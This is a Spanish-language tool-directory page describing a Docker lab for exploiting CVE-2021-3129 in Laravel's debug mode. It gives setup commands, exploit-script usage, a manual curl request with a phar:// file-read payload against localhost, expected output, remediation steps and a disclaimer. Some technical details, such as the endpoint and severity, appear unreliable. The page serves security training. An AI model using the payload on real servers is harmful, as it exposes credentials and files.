Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-3129-Lab — CVE-2021-3129: RCE del Modo de Depuración de Laravel - Laboratorio completo de explotación con exploit en Python, contenedor Docker y guía de análisis de seguridad. | Kitploit
Herramientas/GitHubGitHub/thenareshofficial/cve-2021-3129-lab
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubthenareshofficial/cve-2021-3129-lab

CVE-2021-3129-Lab

CVE-2021-3129: RCE del Modo de Depuración de Laravel - Laboratorio completo de explotación con exploit en Python, contenedor Docker y guía de análisis de seguridad.

Ver Repositorio
18hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-3129: Laboratorio RCE en Modo Debug de Laravel

License: MIT Python 3.8+ Docker CVSS: 7.5

Laboratorio práctico para explotar CVE-2021-3129, una vulnerabilidad crítica de Laravel que permite lectura de archivos sin autenticación y posible RCE.

Inicio Rápido

root@kitploit:~
# Clonar
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# Construir y ejecutar
docker build -t cve-2021-3129-lab:latest .
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# Probar
curl http://localhost:8080/_ide_helper.php

# Explotar
python3 cve_2021_3129_exploit.py http://localhost:8080

¿Qué es CVE-2021-3129?

PropiedadDetalles
SeveridadCVSS 7.5 (Alta)
AfectadoLaravel < 8.4.2, < 7.30.4
ImpactoLectura arbitraria de archivos, divulgación de información, posible RCE
Autenticación requeridaNo
Vector de ataqueRed

Cómo Funciona

  1. Reconocimiento – Identificar Laravel con modo debug habilitado
  2. Validación – Probar el endpoint /_ide_helper.php
  3. Explotación – Usar el wrapper phar:// para leer archivos
  4. Impacto – Extraer credenciales, claves API, variables de entorno

Requisitos Previos

  • Docker Desktop
  • Python 3.8+
  • 4 GB de RAM

Configuración (Paso a Paso)

root@kitploit:~
# 1. Clonar
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# 2. Construir el contenedor
docker build -t cve-2021-3129-lab:latest .

# 3. Ejecutar el contenedor
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# 4. Verificar el endpoint
curl http://localhost:8080/_ide_helper.php

# 5. Ejecutar el exploit
python3 cve_2021_3129_exploit.py http://localhost:8080

Salida Esperada

root@kitploit:~
[✓✓✓] ¡VULNERABILIDAD CVE-2021-3129 CONFIRMADA!

DETALLES DE LA VULNERABILIDAD:
- El modo debug está HABILITADO (APP_DEBUG=true)
- _ide_helper.php es ACCESIBLE
- La lectura arbitraria de archivos es POSIBLE
- Información sensible FILTRADA

Uso del Exploit

root@kitploit:~
# Básico
python3 cve_2021_3129_exploit.py http://localhost:8080

# Tiempo de espera personalizado
python3 cve_2021_3129_exploit.py http://localhost:8080 --timeout 10

# Ayuda
python3 cve_2021_3129_exploit.py -h

Pruebas Manuales

root@kitploit:~
# Probar endpoint
curl http://localhost:8080/_ide_helper.php

# Probar con payload
curl 'http://localhost:8080/_ide_helper.php?subject=phar://storage/logs/laravel.log'

Remedio

root@kitploit:~
# 1. Establecer APP_DEBUG=false en .env
# 2. Eliminar _ide_helper.php
# 3. Actualizar Laravel a la versión parcheada (8.4.2+, 7.30.4+)
# 4. Reiniciar la aplicación

Limpieza

root@kitploit:~
# Detener el contenedor
docker stop laravel-cve-2021-3129

# Eliminar el contenedor
docker rm laravel-cve-2021-3129

# Eliminar la imagen
docker rmi cve-2021-3129-lab:latest

Preguntas Frecuentes

P: ¿Puedo probarlo en internet?
R: No. Esto es solo para localhost. Nunca pruebes en sistemas que no te pertenezcan.

P: ¿Funcionará en versiones parcheadas?
R: No. Laravel 8.4.2+ y 7.30.4+ están parcheados.

P: ¿Puedo modificar el exploit?
R: Sí. El código está completamente comentado para el aprendizaje.

P: ¿Cómo capturar tráfico de red?
R: Usa tcpdump o Wireshark:

root@kitploit:~
sudo tcpdump -i lo -w capture.pcapng 'tcp port 8080'
# En otra terminal, ejecuta el exploit
python3 cve_2021_3129_exploit.py http://localhost:8080
# Abre la captura: wireshark capture.pcapng

Aviso Legal

⚠️ Solo con fines educativos

✅ Usos autorizados:

  • Aprendizaje educativo
  • Pruebas de seguridad autorizadas
  • Investigación defensiva

❌ Usos prohibidos:

  • Acceso no autorizado a sistemas
  • Hacking ilegal
  • Daño a sistemas

Úsalo solo en sistemas que te pertenezcan o para los que tengas permiso explícito de prueba.

Recursos

  • CVE-2021-3129
  • Seguridad de Laravel
  • Wrappers de PHP

Autor

Naresh R (@theNareshofficial)

  • GitHub: https://github.com/theNareshofficial
  • YouTube: https://www.youtube.com/@nareshtechweb930
  • Ubicación: Bengaluru, Karnataka, India

Licencia

Licencia MIT – Ver el archivo LICENSE

Descargar herramienta